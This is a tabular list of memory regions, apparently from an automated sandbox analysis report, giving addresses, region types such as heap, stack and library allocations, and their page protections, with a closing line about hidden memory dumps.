2E44000
|
heap
|
page read and write
|
||
|
24713000
|
heap
|
page read and write
|
||
|
7FFAACD80000
|
trusted library allocation
|
page execute and read and write
|
||
|
5300000
|
trusted library allocation
|
page read and write
|
||
|
29D2C4F9000
|
heap
|
page read and write
|
||
|
29D2C477000
|
heap
|
page read and write
|
||
|
7820000
|
trusted library allocation
|
page read and write
|
||
|
19E804B4000
|
trusted library allocation
|
page read and write
|
||
|
7498000
|
trusted library allocation
|
page read and write
|
||
|
6FCA000
|
stack
|
page read and write
|
||
|
4B0D000
|
heap
|
page read and write
|
||
|
2984000
|
heap
|
page read and write
|
||
|
8AB8000
|
heap
|
page read and write
|
||
|
8438000
|
heap
|
page read and write
|
||
|
880D000
|
stack
|
page read and write
|
||
|
4B09000
|
heap
|
page read and write
|
||
|
8B31000
|
heap
|
page read and write
|
||
|
5300000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACE20000
|
trusted library allocation
|
page read and write
|
||
|
29D2BF07000
|
heap
|
page read and write
|
||
|
5126000
|
heap
|
page read and write
|
||
|
4B11000
|
heap
|
page read and write
|
||
|
6C9E000
|
stack
|
page read and write
|
||
|
5139000
|
heap
|
page read and write
|
||
|
3010000
|
heap
|
page execute and read and write
|
||
|
7FFAACC4C000
|
trusted library allocation
|
page execute and read and write
|
||
|
88C0000
|
direct allocation
|
page read and write
|
||
|
7490000
|
trusted library allocation
|
page read and write
|
||
|
8960000
|
heap
|
page read and write
|
||
|
4B00000
|
heap
|
page read and write
|
||
|
19EF5D02000
|
heap
|
page read and write
|
||
|
4F2A000
|
trusted library allocation
|
page read and write
|
||
|
2960000
|
heap
|
page read and write
|
||
|
29D2A3A0000
|
heap
|
page read and write
|
||
|
29D2C58B000
|
heap
|
page read and write
|
||
|
2E50000
|
heap
|
page read and write
|
||
|
2FA9000
|
trusted library allocation
|
page read and write
|
||
|
29D2C482000
|
heap
|
page read and write
|
||
|
19E8085A000
|
trusted library allocation
|
page read and write
|
||
|
5107000
|
heap
|
page read and write
|
||
|
4F10000
|
trusted library allocation
|
page read and write
|
||
|
321A000
|
heap
|
page read and write
|
||
|
70DB000
|
stack
|
page read and write
|
||
|
8A10000
|
heap
|
page readonly
|
||
|
2E44000
|
heap
|
page read and write
|
||
|
24A33000
|
unclassified section
|
page execute and read and write
|
||
|
29D2C5AF000
|
heap
|
page read and write
|
||
|
19EF5DB6000
|
heap
|
page read and write
|
||
|
3060000
|
heap
|
page read and write
|
||
|
5166000
|
heap
|
page read and write
|
||
|
241FE000
|
stack
|
page read and write
|
||
|
2450F000
|
stack
|
page read and write
|
||
|
29D2BF07000
|
heap
|
page read and write
|
||
|
19EF5CE7000
|
heap
|
page execute and read and write
|
||
|
19E902EA000
|
trusted library allocation
|
page read and write
|
||
|
4B01000
|
heap
|
page read and write
|
||
|
7FFB1E3C5000
|
unkown
|
page readonly
|
||
|
2E44000
|
heap
|
page read and write
|
||
|
5001000
|
heap
|
page read and write
|
||
|
2E44000
|
heap
|
page read and write
|
||
|
4B15000
|
heap
|
page read and write
|
||
|
2423E000
|
stack
|
page read and write
|
||
|
29D2C486000
|
heap
|
page read and write
|
||
|
2C50000
|
heap
|
page read and write
|
||
|
75E0000
|
direct allocation
|
page read and write
|
||
|
89F0000
|
heap
|
page read and write
|
||
|
2E32000
|
stack
|
page read and write
|
||
|
319F000
|
stack
|
page read and write
|
||
|
19EF5F8F000
|
heap
|
page read and write
|
||
|
2E44000
|
heap
|
page read and write
|
||
|
2E2F000
|
stack
|
page read and write
|
||
|
5166000
|
heap
|
page read and write
|
||
|
24698000
|
heap
|
page read and write
|
||
|
5108000
|
heap
|
page read and write
|
||
|
2E44000
|
heap
|
page read and write
|
||
|
8380000
|
heap
|
page read and write
|
||
|
2984000
|
heap
|
page read and write
|
||
|
29D2BF05000
|
heap
|
page read and write
|
||
|
6DAD000
|
remote allocation
|
page execute and read and write
|
||
|
2FFD000
|
heap
|
page read and write
|
||
|
5001000
|
heap
|
page read and write
|
||
|
29D2A4A0000
|
heap
|
page read and write
|
||
|
29D2C4A3000
|
heap
|
page read and write
|
||
|
29D2A500000
|
heap
|
page read and write
|
||
|
83D4000
|
heap
|
page read and write
|
||
|
243CC000
|
stack
|
page read and write
|
||
|
19EF3DD9000
|
heap
|
page read and write
|
||
|
70240000
|
unkown
|
page readonly
|
||
|
7FFB1E3C0000
|
unkown
|
page read and write
|
||
|
8B2F000
|
heap
|
page read and write
|
||
|
29D2BF06000
|
heap
|
page read and write
|
||
|
24586000
|
direct allocation
|
page execute and read and write
|
||
|
19EF5720000
|
trusted library allocation
|
page read and write
|
||
|
7630000
|
trusted library allocation
|
page read and write
|
||
|
2498B000
|
heap
|
page read and write
|
||
|
2E44000
|
heap
|
page read and write
|
||
|
7FFB1E3C5000
|
unkown
|
page readonly
|
||
|
29D2C431000
|
heap
|
page read and write
|
||
|
19E81E28000
|
trusted library allocation
|
page read and write
|
||
|
19EF5F84000
|
heap
|
page read and write
|
||
|
2940000
|
heap
|
page read and write
|
||
|
58D9000
|
trusted library allocation
|
page read and write
|
||
|
4B05000
|
heap
|
page read and write
|
||
|
2F93000
|
trusted library allocation
|
page execute and read and write
|
||
|
D6CF5FE000
|
stack
|
page read and write
|
||
|
19EF58D6000
|
heap
|
page read and write
|
||
|
29D2C496000
|
heap
|
page read and write
|
||
|
8B31000
|
heap
|
page read and write
|
||
|
5111000
|
heap
|
page read and write
|
||
|
5166000
|
heap
|
page read and write
|
||
|
7760000
|
trusted library allocation
|
page read and write
|
||
|
D6CFBFC000
|
stack
|
page read and write
|
||
|
7FFAACE10000
|
trusted library allocation
|
page read and write
|
||
|
510F000
|
heap
|
page read and write
|
||
|
829D000
|
stack
|
page read and write
|
||
|
29D2BF12000
|
heap
|
page read and write
|
||
|
77C0000
|
trusted library allocation
|
page read and write
|
||
|
8B7F000
|
heap
|
page read and write
|
||
|
29D2BF1E000
|
heap
|
page read and write
|
||
|
4B18000
|
heap
|
page read and write
|
||
|
D6CF8FF000
|
stack
|
page read and write
|
||
|
29D2A52B000
|
heap
|
page read and write
|
||
|
29D2C58A000
|
heap
|
page read and write
|
||
|
2E45000
|
heap
|
page read and write
|
||
|
29D2A75C000
|
heap
|
page read and write
|
||
|
6F40000
|
direct allocation
|
page read and write
|
||
|
836D000
|
trusted library allocation
|
page read and write
|
||
|
323E000
|
stack
|
page read and write
|
||
|
4B0B000
|
heap
|
page read and write
|
||
|
7025F000
|
unkown
|
page readonly
|
||
|
5300000
|
trusted library allocation
|
page read and write
|
||
|
29D2A590000
|
heap
|
page read and write
|
||
|
884C000
|
stack
|
page read and write
|
||
|
4B01000
|
heap
|
page read and write
|
||
|
7FFAACCB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAACDB0000
|
trusted library allocation
|
page read and write
|
||
|
5140000
|
heap
|
page read and write
|
||
|
5126000
|
heap
|
page read and write
|
||
|
19E90010000
|
trusted library allocation
|
page read and write
|
||
|
6D7E000
|
stack
|
page read and write
|
||
|
12673A85000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
7468000
|
heap
|
page read and write
|
||
|
29D2BF00000
|
heap
|
page read and write
|
||
|
2495A000
|
heap
|
page read and write
|
||
|
4B37000
|
heap
|
page read and write
|
||
|
29D2BF06000
|
heap
|
page read and write
|
||
|
81F7000
|
stack
|
page read and write
|
||
|
19EF3D90000
|
heap
|
page read and write
|
||
|
29D2A75E000
|
heap
|
page read and write
|
||
|
29D2C530000
|
heap
|
page read and write
|
||
|
29D2A52C000
|
heap
|
page read and write
|
||
|
59AD000
|
remote allocation
|
page execute and read and write
|
||
|
5166000
|
heap
|
page read and write
|
||
|
45D000
|
system
|
page execute and read and write
|
||
|
19EF3DFA000
|
heap
|
page read and write
|
||
|
19EF5DAF000
|
heap
|
page read and write
|
||
|
6F30000
|
direct allocation
|
page read and write
|
||
|
5166000
|
heap
|
page read and write
|
||
|
4B01000
|
heap
|
page read and write
|
||
|
2DD4000
|
heap
|
page read and write
|
||
|
4B10000
|
heap
|
page read and write
|
||
|
2469A000
|
heap
|
page read and write
|
||
|
7FFB1E3B6000
|
unkown
|
page readonly
|
||
|
242CC000
|
stack
|
page read and write
|
||
|
70E0000
|
heap
|
page read and write
|
||
|
5166000
|
heap
|
page read and write
|
||
|
7FFAACDE0000
|
trusted library allocation
|
page read and write
|
||
|
2444D000
|
stack
|
page read and write
|
||
|
19E8201A000
|
trusted library allocation
|
page read and write
|
||
|
29D2A542000
|
heap
|
page read and write
|
||
|
4B18000
|
heap
|
page read and write
|
||
|
2FA0000
|
trusted library allocation
|
page read and write
|
||
|
29D2C486000
|
heap
|
page read and write
|
||
|
29D2C010000
|
remote allocation
|
page read and write
|
||
|
58D1000
|
trusted library allocation
|
page read and write
|
||
|
2FC0000
|
trusted library allocation
|
page read and write
|
||
|
29D2C477000
|
heap
|
page read and write
|
||
|
4AE0000
|
heap
|
page read and write
|
||
|
5119000
|
heap
|
page read and write
|
||
|
D6CF9FE000
|
stack
|
page read and write
|
||
|
248E3000
|
heap
|
page read and write
|
||
|
144AAFC000
|
stack
|
page read and write
|
||
|
29D2C552000
|
heap
|
page read and write
|
||
|
240AD000
|
stack
|
page read and write
|
||
|
7FFAACB93000
|
trusted library allocation
|
page execute and read and write
|
||
|
29D2C5E6000
|
heap
|
page read and write
|
||
|
5166000
|
heap
|
page read and write
|
||
|
5166000
|
heap
|
page read and write
|
||
|
29D2A53F000
|
heap
|
page read and write
|
||
|
24698000
|
heap
|
page read and write
|
||
|
511C000
|
heap
|
page read and write
|
||
|
23BF0000
|
direct allocation
|
page read and write
|
||
|
4B18000
|
heap
|
page read and write
|
||
|
19EF5F20000
|
heap
|
page read and write
|
||
|
2F60000
|
heap
|
page read and write
|
||
|
7FFAACDA0000
|
trusted library allocation
|
page read and write
|
||
|
8370000
|
trusted library allocation
|
page read and write
|
||
|
41B000
|
system
|
page execute and read and write
|
||
|
4B18000
|
heap
|
page read and write
|
||
|
5130000
|
heap
|
page read and write
|
||
|
6CDE000
|
stack
|
page read and write
|
||
|
29D2A5B7000
|
heap
|
page read and write
|
||
|
24620000
|
heap
|
page read and write
|
||
|
73AF000
|
heap
|
page read and write
|
||
|
247C0000
|
heap
|
page read and write
|
||
|
7FFAACE60000
|
trusted library allocation
|
page read and write
|
||
|
2E1B000
|
stack
|
page read and write
|
||
|
2984000
|
heap
|
page read and write
|
||
|
2CCE000
|
stack
|
page read and write
|
||
|
4B18000
|
heap
|
page read and write
|
||
|
77A0000
|
trusted library allocation
|
page read and write
|
||
|
5108000
|
heap
|
page read and write
|
||
|
7FFB1E3B6000
|
unkown
|
page readonly
|
||
|
2F60000
|
trusted library section
|
page read and write
|
||
|
8BAE000
|
heap
|
page read and write
|
||
|
7FFB1E3C2000
|
unkown
|
page readonly
|
||
|
459000
|
system
|
page execute and read and write
|
||
|
12673A80000
|
heap
|
page read and write
|
||
|
320E000
|
stack
|
page read and write
|
||
|
29D2A5F7000
|
heap
|
page read and write
|
||
|
970000
|
heap
|
page read and write
|
||
|
29D2A586000
|
heap
|
page read and write
|
||
|
19EF58D8000
|
heap
|
page read and write
|
||
|
19EF5D57000
|
heap
|
page read and write
|
||
|
85A0000
|
trusted library allocation
|
page read and write
|
||
|
8BAE000
|
heap
|
page read and write
|
||
|
29D2BF04000
|
heap
|
page read and write
|
||
|
4B16000
|
heap
|
page read and write
|
||
|
4D1F000
|
stack
|
page read and write
|
||
|
19EF3DE4000
|
heap
|
page read and write
|
||
|
29D2C552000
|
heap
|
page read and write
|
||
|
29D2C5E6000
|
heap
|
page read and write
|
||
|
8625000
|
trusted library allocation
|
page read and write
|
||
|
29D2C476000
|
heap
|
page read and write
|
||
|
5166000
|
heap
|
page read and write
|
||
|
19E81AD4000
|
trusted library allocation
|
page read and write
|
||
|
6F20000
|
direct allocation
|
page read and write
|
||
|
8B35000
|
heap
|
page read and write
|
||
|
4B18000
|
heap
|
page read and write
|
||
|
4B18000
|
heap
|
page read and write
|
||
|
29D2C4A8000
|
heap
|
page read and write
|
||
|
9CFD000
|
direct allocation
|
page execute and read and write
|
||
|
29D2C54C000
|
heap
|
page read and write
|
||
|
58E1000
|
trusted library allocation
|
page read and write
|
||
|
D6CF4FA000
|
stack
|
page read and write
|
||
|
29D2BF1E000
|
heap
|
page read and write
|
||
|
7FFAACDC0000
|
trusted library allocation
|
page read and write
|
||
|
48B0000
|
trusted library allocation
|
page read and write
|
||
|
4B18000
|
heap
|
page read and write
|
||
|
19E80831000
|
trusted library allocation
|
page read and write
|
||
|
24AC0000
|
heap
|
page read and write
|
||
|
29D2C4A1000
|
heap
|
page read and write
|
||
|
29D2C4A1000
|
heap
|
page read and write
|
||
|
12673930000
|
heap
|
page read and write
|
||
|
5166000
|
heap
|
page read and write
|
||
|
709D000
|
stack
|
page read and write
|
||
|
29D2A750000
|
heap
|
page read and write
|
||
|
4858000
|
trusted library allocation
|
page read and write
|
||
|
75C0000
|
trusted library allocation
|
page read and write
|
||
|
2F80000
|
trusted library allocation
|
page read and write
|
||
|
29D2C467000
|
heap
|
page read and write
|
||
|
7FFAACE00000
|
trusted library allocation
|
page read and write
|
||
|
88D0000
|
direct allocation
|
page read and write
|
||
|
19EF3EB0000
|
trusted library allocation
|
page read and write
|
||
|
29D2BF07000
|
heap
|
page read and write
|
||
|
19EF3DB6000
|
heap
|
page read and write
|
||
|
19EF5791000
|
heap
|
page read and write
|
||
|
2F70000
|
heap
|
page read and write
|
||
|
2BF9000
|
stack
|
page read and write
|
||
|
305E000
|
stack
|
page read and write
|
||
|
8B7F000
|
heap
|
page read and write
|
||
|
2D8E000
|
stack
|
page read and write
|
||
|
77AD000
|
remote allocation
|
page execute and read and write
|
||
|
4B11000
|
heap
|
page read and write
|
||
|
5166000
|
heap
|
page read and write
|
||
|
4B18000
|
heap
|
page read and write
|
||
|
19EF3F75000
|
heap
|
page read and write
|
||
|
24570000
|
direct allocation
|
page read and write
|
||
|
2C50000
|
heap
|
page read and write
|
||
|
2434C000
|
stack
|
page read and write
|
||
|
4B15000
|
heap
|
page read and write
|
||
|
19E81E42000
|
trusted library allocation
|
page read and write
|
||
|
8CB0000
|
direct allocation
|
page read and write
|
||
|
22FFAFD000
|
stack
|
page read and write
|
||
|
4B09000
|
heap
|
page read and write
|
||
|
514B000
|
heap
|
page read and write
|
||
|
29D2A5C3000
|
heap
|
page read and write
|
||
|
5126000
|
heap
|
page read and write
|
||
|
29D2C4A8000
|
heap
|
page read and write
|
||
|
8B31000
|
heap
|
page read and write
|
||
|
2B97000
|
heap
|
page read and write
|
||
|
24621000
|
heap
|
page read and write
|
||
|
248B3000
|
heap
|
page read and write
|
||
|
4B0D000
|
heap
|
page read and write
|
||
|
2415E000
|
stack
|
page read and write
|
||
|
4B15000
|
heap
|
page read and write
|
||
|
5001000
|
heap
|
page read and write
|
||
|
2E70000
|
heap
|
page read and write
|
||
|
2E44000
|
heap
|
page read and write
|
||
|
786B000
|
stack
|
page read and write
|
||
|
4B0D000
|
heap
|
page read and write
|
||
|
29D2C482000
|
heap
|
page read and write
|
||
|
24540000
|
unclassified section
|
page execute and read and write
|
||
|
7FFAACD90000
|
trusted library allocation
|
page read and write
|
||
|
5166000
|
heap
|
page read and write
|
||
|
2F0F000
|
stack
|
page read and write
|
||
|
2984000
|
heap
|
page read and write
|
||
|
4B18000
|
heap
|
page read and write
|
||
|
4B18000
|
heap
|
page read and write
|
||
|
2984000
|
heap
|
page read and write
|
||
|
31AF000
|
stack
|
page read and write
|
||
|
874C000
|
stack
|
page read and write
|
||
|
D6CFDFF000
|
stack
|
page read and write
|
||
|
2E45000
|
heap
|
page read and write
|
||
|
9FD000
|
stack
|
page read and write
|
||
|
144A9FE000
|
stack
|
page read and write
|
||
|
2483A000
|
heap
|
page read and write
|
||
|
6D3E000
|
stack
|
page read and write
|
||
|
19EF3D70000
|
heap
|
page read and write
|
||
|
5166000
|
heap
|
page read and write
|
||
|
29D2A592000
|
heap
|
page read and write
|
||
|
29D2C4BB000
|
heap
|
page read and write
|
||
|
19EF3D30000
|
heap
|
page read and write
|
||
|
92D000
|
stack
|
page read and write
|
||
|
7FFAACD4A000
|
trusted library allocation
|
page read and write
|
||
|
C00000
|
heap
|
page read and write
|
||
|
309E000
|
stack
|
page read and write
|
||
|
8D00000
|
direct allocation
|
page read and write
|
||
|
82DE000
|
stack
|
page read and write
|
||
|
2984000
|
heap
|
page read and write
|
||
|
351F000
|
stack
|
page read and write
|
||
|
2E34000
|
stack
|
page read and write
|
||
|
29D2C472000
|
heap
|
page read and write
|
||
|
2A2E000
|
unkown
|
page read and write
|
||
|
48D1000
|
trusted library allocation
|
page read and write
|
||
|
5166000
|
heap
|
page read and write
|
||
|
8B35000
|
heap
|
page read and write
|
||
|
6DFE000
|
stack
|
page read and write
|
||
|
2E45000
|
heap
|
page read and write
|
||
|
4B01000
|
heap
|
page read and write
|
||
|
29D2C54C000
|
heap
|
page read and write
|
||
|
29D2A5E4000
|
heap
|
page read and write
|
||
|
CEFD000
|
direct allocation
|
page execute and read and write
|
||
|
4F21000
|
heap
|
page read and write
|
||
|
77E0000
|
trusted library allocation
|
page read and write
|
||
|
701E000
|
stack
|
page read and write
|
||
|
5101000
|
heap
|
page read and write
|
||
|
7FFAACE70000
|
trusted library allocation
|
page read and write
|
||
|
4B0D000
|
heap
|
page read and write
|
||
|
48C0000
|
heap
|
page read and write
|
||
|
2984000
|
heap
|
page read and write
|
||
|
5166000
|
heap
|
page read and write
|
||
|
24698000
|
heap
|
page read and write
|
||
|
29D2BF0A000
|
heap
|
page read and write
|
||
|
19EF58D0000
|
heap
|
page read and write
|
||
|
4B11000
|
heap
|
page read and write
|
||
|
8360000
|
trusted library allocation
|
page read and write
|
||
|
8CD0000
|
direct allocation
|
page read and write
|
||
|
24AB0000
|
heap
|
page read and write
|
||
|
1267393A000
|
heap
|
page read and write
|
||
|
30AE000
|
stack
|
page read and write
|
||
|
2984000
|
heap
|
page read and write
|
||
|
4B18000
|
heap
|
page read and write
|
||
|
24571000
|
direct allocation
|
page execute and read and write
|
||
|
23BE0000
|
direct allocation
|
page read and write
|
||
|
29D2A590000
|
heap
|
page read and write
|
||
|
6ED0000
|
direct allocation
|
page read and write
|
||
|
19EF5F56000
|
heap
|
page read and write
|
||
|
19E80814000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACBAB000
|
trusted library allocation
|
page read and write
|
||
|
2E2D000
|
heap
|
page read and write
|
||
|
29D2BF01000
|
heap
|
page read and write
|
||
|
8B64000
|
heap
|
page read and write
|
||
|
29D2BF07000
|
heap
|
page read and write
|
||
|
4B01000
|
heap
|
page read and write
|
||
|
4B18000
|
heap
|
page read and write
|
||
|
2E45000
|
heap
|
page read and write
|
||
|
510F000
|
heap
|
page read and write
|
||
|
19EF3ED0000
|
trusted library allocation
|
page read and write
|
||
|
29D2A75E000
|
heap
|
page read and write
|
||
|
144A4FC000
|
stack
|
page read and write
|
||
|
4B00000
|
heap
|
page read and write
|
||
|
5300000
|
trusted library allocation
|
page read and write
|
||
|
8CF0000
|
direct allocation
|
page read and write
|
||
|
29D2C496000
|
heap
|
page read and write
|
||
|
19EF3D10000
|
heap
|
page read and write
|
||
|
29D2C5DF000
|
heap
|
page read and write
|
||
|
74A0000
|
heap
|
page execute and read and write
|
||
|
19EF5CE0000
|
heap
|
page execute and read and write
|
||
|
4B1B000
|
heap
|
page read and write
|
||
|
2E45000
|
heap
|
page read and write
|
||
|
4B18000
|
heap
|
page read and write
|
||
|
3283000
|
heap
|
page read and write
|
||
|
7FFAACC46000
|
trusted library allocation
|
page read and write
|
||
|
24839000
|
heap
|
page read and write
|
||
|
2C28000
|
heap
|
page read and write
|
||
|
29D2BF05000
|
heap
|
page read and write
|
||
|
4B0F000
|
heap
|
page read and write
|
||
|
8590000
|
trusted library allocation
|
page read and write
|
||
|
6EF0000
|
direct allocation
|
page read and write
|
||
|
510F000
|
heap
|
page read and write
|
||
|
4B15000
|
heap
|
page read and write
|
||
|
8230000
|
trusted library allocation
|
page read and write
|
||
|
8B35000
|
heap
|
page read and write
|
||
|
4B01000
|
heap
|
page read and write
|
||
|
29D2A5E4000
|
heap
|
page read and write
|
||
|
4B15000
|
heap
|
page read and write
|
||
|
2E44000
|
heap
|
page read and write
|
||
|
2F9D000
|
trusted library allocation
|
page execute and read and write
|
||
|
2440F000
|
stack
|
page read and write
|
||
|
5166000
|
heap
|
page read and write
|
||
|
29D2A569000
|
heap
|
page read and write
|
||
|
7FFAACB94000
|
trusted library allocation
|
page read and write
|
||
|
4B08000
|
heap
|
page read and write
|
||
|
4B18000
|
heap
|
page read and write
|
||
|
5300000
|
trusted library allocation
|
page read and write
|
||
|
4AE1000
|
heap
|
page read and write
|
||
|
8B3F000
|
heap
|
page read and write
|
||
|
2F90000
|
trusted library allocation
|
page read and write
|
||
|
8BAE000
|
heap
|
page read and write
|
||
|
2FF0000
|
heap
|
page readonly
|
||
|
741D000
|
heap
|
page read and write
|
||
|
841D000
|
heap
|
page read and write
|
||
|
4B09000
|
heap
|
page read and write
|
||
|
2E16000
|
stack
|
page read and write
|
||
|
4A2B000
|
trusted library allocation
|
page read and write
|
||
|
4B1A000
|
heap
|
page read and write
|
||
|
4B18000
|
heap
|
page read and write
|
||
|
4B0C000
|
heap
|
page read and write
|
||
|
44E0000
|
remote allocation
|
page execute and read and write
|
||
|
4B0D000
|
heap
|
page read and write
|
||
|
2F70000
|
heap
|
page read and write
|
||
|
4B0F000
|
heap
|
page read and write
|
||
|
19E808A6000
|
trusted library allocation
|
page read and write
|
||
|
144B64B000
|
stack
|
page read and write
|
||
|
705D000
|
stack
|
page read and write
|
||
|
7FFAACB9D000
|
trusted library allocation
|
page execute and read and write
|
||
|
4935000
|
trusted library allocation
|
page read and write
|
||
|
29D2C552000
|
heap
|
page read and write
|
||
|
29D2A5F7000
|
heap
|
page read and write
|
||
|
8B32000
|
heap
|
page read and write
|
||
|
144A67E000
|
stack
|
page read and write
|
||
|
29D2C4B9000
|
heap
|
page read and write
|
||
|
7FFAACE80000
|
trusted library allocation
|
page read and write
|
||
|
5108000
|
heap
|
page read and write
|
||
|
29D2C55D000
|
heap
|
page read and write
|
||
|
2F78000
|
heap
|
page read and write
|
||
|
29D2BF1E000
|
heap
|
page read and write
|
||
|
19EF5F26000
|
heap
|
page read and write
|
||
|
7FFAACDD0000
|
trusted library allocation
|
page read and write
|
There are 956 hidden memdumps, click here to show them.